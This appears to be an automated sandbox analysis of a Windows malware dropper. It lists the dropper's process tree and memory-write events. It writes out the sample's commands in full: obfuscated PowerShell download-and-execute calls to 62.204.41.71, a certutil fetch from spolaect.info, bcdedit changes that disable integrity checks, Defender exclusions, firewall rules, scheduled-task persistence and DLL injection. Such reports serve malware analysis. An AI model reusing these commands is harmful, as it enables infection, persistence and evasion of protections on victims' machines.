PID 1808 wrote to memory of 1208	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 1808 wrote to memory of 1208	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 1808 wrote to memory of 1208	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 1808 wrote to memory of 1208	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 1808 wrote to memory of 1208	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 1808 wrote to memory of 2004	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Files.exe
PID 1808 wrote to memory of 2004	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Files.exe
PID 1808 wrote to memory of 2004	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Files.exe
PID 1808 wrote to memory of 2004	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Files.exe
PID 1808 wrote to memory of 1668	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	pub2.exe
PID 1808 wrote to memory of 1668	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	pub2.exe
PID 1808 wrote to memory of 1668	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	pub2.exe
PID 1808 wrote to memory of 1668	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	pub2.exe
PID 1808 wrote to memory of 1732	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	File.exe
PID 1808 wrote to memory of 1732	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	File.exe
PID 1808 wrote to memory of 1732	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	File.exe
PID 1808 wrote to memory of 1732	1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	File.exe
PID 2004 wrote to memory of 1504	2004	Files.exe	jfiag3g_gg.exe
PID 2004 wrote to memory of 1504	2004	Files.exe	jfiag3g_gg.exe
PID 2004 wrote to memory of 1504	2004	Files.exe	jfiag3g_gg.exe
PID 2004 wrote to memory of 1504	2004	Files.exe	jfiag3g_gg.exe
PID 1208 wrote to memory of 1380	1208	Install.exe	cmd.exe
PID 1208 wrote to memory of 1380	1208	Install.exe	cmd.exe
PID 1208 wrote to memory of 1380	1208	Install.exe	cmd.exe
PID 1208 wrote to memory of 1380	1208	Install.exe	cmd.exe
PID 1380 wrote to memory of 1660	1380	cmd.exe	taskkill.exe
PID 1380 wrote to memory of 1660	1380	cmd.exe	taskkill.exe
PID 1380 wrote to memory of 1660	1380	cmd.exe	taskkill.exe
PID 1380 wrote to memory of 1660	1380	cmd.exe	taskkill.exe
PID 2004 wrote to memory of 2000	2004	Files.exe	jfiag3g_gg.exe
PID 2004 wrote to memory of 2000	2004	Files.exe	jfiag3g_gg.exe
PID 2004 wrote to memory of 2000	2004	Files.exe	jfiag3g_gg.exe
PID 2004 wrote to memory of 2000	2004	Files.exe	jfiag3g_gg.exe
PID 1696 wrote to memory of 1208	1696	Graphics.exe	cmd.exe
PID 1696 wrote to memory of 1208	1696	Graphics.exe	cmd.exe
PID 1696 wrote to memory of 1208	1696	Graphics.exe	cmd.exe
PID 1696 wrote to memory of 1208	1696	Graphics.exe	cmd.exe
PID 1208 wrote to memory of 1380	1208	cmd.exe	netsh.exe
PID 1208 wrote to memory of 1380	1208	cmd.exe	netsh.exe
PID 1208 wrote to memory of 1380	1208	cmd.exe	netsh.exe
PID 1696 wrote to memory of 860	1696	Graphics.exe	csrss.exe
PID 1696 wrote to memory of 860	1696	Graphics.exe	csrss.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2340 attrib.exe

pid	process
2340	attrib.exe

C:\Users\Admin\AppData\Local\Temp\9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
"C:\Users\Admin\AppData\Local\Temp\9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1808

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:468

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:1652

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies data under HKEY_USERS
PID:1380

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1084

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
5⤵
- Creates scheduled task(s)
PID:1136

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1928

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
6⤵
- Modifies boot configuration data using bcdedit
PID:880

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:624

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:1992

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
6⤵
- Modifies boot configuration data using bcdedit
PID:2000

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:908

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:1384

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
6⤵
- Modifies boot configuration data using bcdedit
PID:1484

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
6⤵
- Modifies boot configuration data using bcdedit
PID:1660

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
6⤵
- Modifies boot configuration data using bcdedit
PID:520

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
6⤵
- Modifies boot configuration data using bcdedit
PID:1936

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
6⤵
- Modifies boot configuration data using bcdedit
PID:1992

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
6⤵
- Modifies boot configuration data using bcdedit
PID:1556

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:908

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
5⤵
- Modifies boot configuration data using bcdedit
PID:1208

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
5⤵
- Executes dropped EXE
PID:1116

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:624

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:432

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2004

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1504

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2000

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1668

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:1732

C:\Users\Admin\Pictures\Adobe Films\bP_kFoM98cS9h2G6eOSsB60D.exe
"C:\Users\Admin\Pictures\Adobe Films\bP_kFoM98cS9h2G6eOSsB60D.exe"
3⤵
- Executes dropped EXE
PID:1484

C:\Users\Admin\Pictures\Adobe Films\bHz3_VobBxPWAqOHn4cl_I6r.exe
"C:\Users\Admin\Pictures\Adobe Films\bHz3_VobBxPWAqOHn4cl_I6r.exe"
3⤵
- Executes dropped EXE
PID:2092

C:\Users\Admin\Pictures\Adobe Films\3ttuKG88mjTgiZsD4jXt6kc3.exe
"C:\Users\Admin\Pictures\Adobe Films\3ttuKG88mjTgiZsD4jXt6kc3.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2100

C:\Users\Admin\Documents\Ey9pyanhMlZNabhB4PrSO8sl.exe
"C:\Users\Admin\Documents\Ey9pyanhMlZNabhB4PrSO8sl.exe"
4⤵
- Executes dropped EXE
PID:2720

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2576

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Executes dropped EXE
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Users\Admin\Pictures\Adobe Films\zFdDMSbIeAhDTUwR9NKYycuo.exe
"C:\Users\Admin\Pictures\Adobe Films\zFdDMSbIeAhDTUwR9NKYycuo.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Users\Admin\AppData\Local\Temp\RegSvc.exe
"C:\Users\Admin\AppData\Local\Temp\RegSvc.exe"
4⤵
- Executes dropped EXE
PID:2336

C:\Users\Admin\Pictures\Adobe Films\QqHMqyPegulHKc10mDj8onzU.exe
"C:\Users\Admin\Pictures\Adobe Films\QqHMqyPegulHKc10mDj8onzU.exe"
3⤵
- Executes dropped EXE
PID:2152

C:\Users\Admin\Pictures\Adobe Films\1OJ8SqjuMBfCl8TNosQLzxSG.exe
"C:\Users\Admin\Pictures\Adobe Films\1OJ8SqjuMBfCl8TNosQLzxSG.exe"
3⤵
- Executes dropped EXE
PID:2180

C:\Users\Admin\Pictures\Adobe Films\swkptQGCL_6GOXNqiLUpRvXT.exe
"C:\Users\Admin\Pictures\Adobe Films\swkptQGCL_6GOXNqiLUpRvXT.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies system certificate store
PID:2200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im swkptQGCL_6GOXNqiLUpRvXT.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\swkptQGCL_6GOXNqiLUpRvXT.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:2476

C:\Windows\SysWOW64\taskkill.exe
taskkill /im swkptQGCL_6GOXNqiLUpRvXT.exe /f
5⤵
- Kills process with taskkill
PID:1616

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:2576

C:\Users\Admin\Pictures\Adobe Films\n2twTe1XJnPp0MnQM9nj6_sV.exe
"C:\Users\Admin\Pictures\Adobe Films\n2twTe1XJnPp0MnQM9nj6_sV.exe"
3⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "n2twTe1XJnPp0MnQM9nj6_sV.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\n2twTe1XJnPp0MnQM9nj6_sV.exe" & exit
4⤵
PID:2836

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "n2twTe1XJnPp0MnQM9nj6_sV.exe" /f
5⤵
- Kills process with taskkill
PID:2876

C:\Users\Admin\Pictures\Adobe Films\H7niythF9LYUl22UCCxKqL_Q.exe
"C:\Users\Admin\Pictures\Adobe Films\H7niythF9LYUl22UCCxKqL_Q.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2220

C:\Users\Admin\Pictures\Adobe Films\lXYcLBZvdNhHR1z4XaSWnxTA.exe
"C:\Users\Admin\Pictures\Adobe Films\lXYcLBZvdNhHR1z4XaSWnxTA.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:2708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2944

C:\Users\Admin\Pictures\Adobe Films\gqvfeWqT3QZ4Rl77_be8ayy7.exe
"C:\Users\Admin\Pictures\Adobe Films\gqvfeWqT3QZ4Rl77_be8ayy7.exe"
3⤵
- Executes dropped EXE
PID:2244

C:\Users\Admin\Pictures\Adobe Films\3lbcA3zU71jzVJgagV0EDJkq.exe
"C:\Users\Admin\Pictures\Adobe Films\3lbcA3zU71jzVJgagV0EDJkq.exe"
3⤵
- Executes dropped EXE
PID:2308

C:\Users\Admin\Pictures\Adobe Films\gbqGqcffMnDtAfCz9X6LQ9zb.exe
"C:\Users\Admin\Pictures\Adobe Films\gbqGqcffMnDtAfCz9X6LQ9zb.exe"
3⤵
- Executes dropped EXE
PID:2388

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:2160

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:2276

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:2056

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_9.zip -oextracted
5⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_8.zip -oextracted
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_7.zip -oextracted
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_6.zip -oextracted
5⤵
- Executes dropped EXE
PID:2828

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_5.zip -oextracted
5⤵
- Executes dropped EXE
PID:2756

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
PID:1996

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_4.zip -oextracted
5⤵
- Executes dropped EXE
PID:2548

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
PID:2292

C:\Windows\system32\attrib.exe
attrib +H "Result_protected.exe"
5⤵
- Views/modifies file attributes
PID:2340

C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
"Result_protected.exe"
5⤵
PID:2568

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
6⤵
PID:2116

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
7⤵
- Creates scheduled task(s)
PID:2496

C:\Users\Admin\AppData\Local\Temp\222.exe
"C:\Users\Admin\AppData\Local\Temp\222.exe"
6⤵
- Executes dropped EXE
PID:2304

C:\Users\Admin\Pictures\Adobe Films\x8SBfZE_z7wYViyOSKxSBQ5T.exe
"C:\Users\Admin\Pictures\Adobe Films\x8SBfZE_z7wYViyOSKxSBQ5T.exe"
3⤵
- Executes dropped EXE
PID:2372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\oxsopzki\
4⤵
PID:2148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vuojjxkr.exe" C:\Windows\SysWOW64\oxsopzki\
4⤵
PID:2040

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description oxsopzki "wifi internet conection"
4⤵
PID:2476

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start oxsopzki
4⤵
PID:2000

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create oxsopzki binPath= "C:\Windows\SysWOW64\oxsopzki\vuojjxkr.exe /d\"C:\Users\Admin\Pictures\Adobe Films\x8SBfZE_z7wYViyOSKxSBQ5T.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:2852

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:2540

C:\Users\Admin\Pictures\Adobe Films\bEjKZ7SLVjLFCCDxqADgP061.exe
"C:\Users\Admin\Pictures\Adobe Films\bEjKZ7SLVjLFCCDxqADgP061.exe"
3⤵
- Executes dropped EXE
PID:2352

C:\Users\Admin\Pictures\Adobe Films\0nK73DZYs8FfhS_Ohqy2_KMy.exe
"C:\Users\Admin\Pictures\Adobe Films\0nK73DZYs8FfhS_Ohqy2_KMy.exe"
3⤵
- Executes dropped EXE
PID:2584

C:\Users\Admin\AppData\Local\Temp\7zS2A5B.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
PID:2580

C:\Users\Admin\AppData\Local\Temp\7zS4402.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2800

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2948

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:2812

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:2280

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2536

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:1036

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:2840

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:2852

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gGsMdrPmN" /SC once /ST 02:32:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gGsMdrPmN"
6⤵
PID:2188

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gGsMdrPmN"
6⤵
PID:2992

C:\Windows\SysWOW64\schtasks.exe
